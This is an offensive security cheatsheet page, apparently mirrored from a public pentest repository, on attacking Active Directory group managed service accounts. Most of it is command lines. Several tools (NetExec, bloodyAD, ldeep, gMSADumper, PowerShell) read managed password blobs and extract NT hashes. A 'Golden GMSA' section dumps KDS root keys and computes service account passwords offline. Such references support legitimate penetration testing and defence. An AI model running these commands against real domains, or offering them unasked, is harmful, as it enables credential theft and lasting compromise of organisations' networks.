daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pwd-read-gmsa.md (4909B)


      1 ---
      2 title: "Password - GMSA"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/pwd-read-gmsa.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-read-gmsa.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Password - GMSA
     12 
     13 ## Reading GMSA Password
     14 
     15 > User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes.
     16 
     17 ### GMSA Attributes in the Active Directory
     18 
     19 * `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password.
     20 * `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts.
     21 * `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
     22 * `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
     23 
     24 ### Extract NT hash from the Active Directory
     25 
     26 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec)
     27 
     28   ```ps1
     29   netexec ldap 10.10.10.10 -u user -p pass --gmsa
     30 
     31   # Use --lsa to get GMSA ID
     32   netexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99
     33   netexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....'
     34   ```
     35 
     36 * [CravateRouge/bloodyAD](https://github.com/CravateRouge/bloodyAD)
     37 
     38   ```ps1
     39   bloodyAD --host 10.10.10.10 -d crash.lab -u john -p 'Pass123*' get search --filter '(ObjectClass=msDS-GroupManagedServiceAccount)' --attr msDS-ManagedPassword
     40   ```
     41 
     42 * [franc-pentest/ldeep](https://github.com/franc-pentest/ldeep)
     43 
     44   ```ps1
     45   ldeep ldap -s dc1.domain.local -u 'username' -p 'P@ssw0rd' -d domain.local gmsa
     46   ```
     47 
     48 * [rvazarkar/GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader)
     49 
     50   ```ps1
     51   GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
     52   ```
     53 
     54 * [micahvandeusen/gMSADumper](https://github.com/micahvandeusen/gMSADumper)
     55 
     56    ```powershell
     57   python3 gMSADumper.py -u User -p Password1 -d domain.local
     58   ```
     59   
     60 * Active Directory Powershell
     61 
     62   ```ps1
     63   $gmsa =  Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
     64   $blob = $gmsa.'msDS-ManagedPassword'
     65   $mp = ConvertFrom-ADManagedPasswordBlob $blob
     66   $hash1 =  ConvertTo-NTHash -Password $mp.SecureCurrentPassword
     67   ```
     68 
     69 * [kdejoyce/gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module
     70 
     71 ## Forging Golden GMSA
     72 
     73 > One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.
     74 
     75 :warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future.
     76 
     77 * Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA)
     78 
     79     ```ps1
     80     # Enumerate all gMSAs
     81     GoldenGMSA.exe gmsainfo
     82     # Query for a specific gMSA
     83     GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112
     84 
     85     # Dump all KDS Root Keys
     86     GoldenGMSA.exe kdsinfo
     87     # Dump a specific KDS Root Key
     88     GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb
     89 
     90     # Compute gMSA password
     91     # --sid <gMSA SID>: SID of the gMSA (required)
     92     # --kdskey <Base64-encoded blob>: Base64 encoded KDS Root Key
     93     # --pwdid <Base64-encoded blob>: Base64 of msds-ManagedPasswordID attribute value
     94     GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain
     95     GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access
     96     GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode
     97     ```
     98 
     99 ## References
    100 
    101 * [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/)
    102 * [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
    103 * [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)